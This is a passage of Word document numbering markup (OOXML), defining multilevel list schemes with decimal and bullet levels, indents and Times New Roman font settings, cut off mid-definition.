        <w:ind w:left="6998" w:hanging="692"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="14">
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="13"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1630" w:hanging="600"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1630" w:hanging="600"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        <w:spacing w:val="0"/>
        <w:w w:val="99"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2.%3"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2216" w:hanging="692"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        <w:spacing w:val="0"/>
        <w:w w:val="100"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7968" w:hanging="692"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="8057" w:hanging="692"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="8146" w:hanging="692"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="8235" w:hanging="692"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="8324" w:hanging="692"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="8413" w:hanging="692"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="13">
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="12"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1630" w:hanging="600"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1630" w:hanging="600"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        <w:spacing w:val="0"/>
        <w:w w:val="99"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2.%3"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2216" w:hanging="692"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        <w:spacing w:val="0"/>
        <w:w w:val="99"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3635" w:hanging="692"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4343" w:hanging="692"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5051" w:hanging="692"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5759" w:hanging="692"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6467" w:hanging="692"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7175" w:hanging="692"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="12">
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="11"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1623" w:hanging="593"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="2"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1623" w:hanging="593"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        <w:spacing w:val="-2"/>
        <w:w w:val="99"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2.%3"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2216" w:hanging="692"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        <w:spacing w:val="0"/>
        <w:w w:val="99"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3635" w:hanging="692"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4343" w:hanging="692"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5051" w:hanging="692"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5759" w:hanging="692"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6467" w:hanging="692"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7175" w:hanging="692"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="11">
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="10"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1628" w:hanging="598"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1628" w:hanging="598"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        <w:spacing w:val="0"/>
        <w:w w:val="99"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3014" w:hanging="598"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3711" w:hanging="598"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4408" w:hanging="598"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5105" w:hanging="598"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5802" w:hanging="598"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6499" w:hanging="598"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7196" w:hanging="598"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="10">
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="9"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1523" w:hanging="492"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1523" w:hanging="492"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        <w:spacing w:val="0"/>
        <w:w w:val="99"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2934" w:hanging="492"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3641" w:hanging="492"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4348" w:hanging="492"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5055" w:hanging="492"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5762" w:hanging="492"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6469" w:hanging="492"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7176" w:hanging="492"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="9">
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="8"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1523" w:hanging="493"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1523" w:hanging="493"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        <w:spacing w:val="0"/>
        <w:w w:val="99"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2.%3"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2120" w:hanging="596"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        <w:spacing w:val="-31"/>
        <w:w w:val="99"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3558" w:hanging="596"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4277" w:hanging="596"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4996" w:hanging="596"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5715" w:hanging="596"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6434" w:hanging="596"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7153" w:hanging="596"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="8">
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="7"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1525" w:hanging="495"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1525" w:hanging="495"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        <w:spacing w:val="0"/>
        <w:w w:val="99"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2.%3"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2120" w:hanging="596"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        <w:spacing w:val="0"/>
        <w:w w:val="100"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="8091" w:hanging="596"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="8162" w:hanging="596"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="8234" w:hanging="596"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="8305" w:hanging="596"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="8377" w:hanging="596"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="8448" w:hanging="596"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="7">
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="6"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1525" w:hanging="495"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1525" w:hanging="495"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        <w:spacing w:val="0"/>
        <w:w w:val="99"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2.%3"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2120" w:hanging="596"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        <w:spacing w:val="-31"/>
        <w:w w:val="99"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3558" w:hanging="596"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4277" w:hanging="596"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4996" w:hanging="596"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5715" w:hanging="596"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6434" w:hanging="596"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7153" w:hanging="596"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="6">
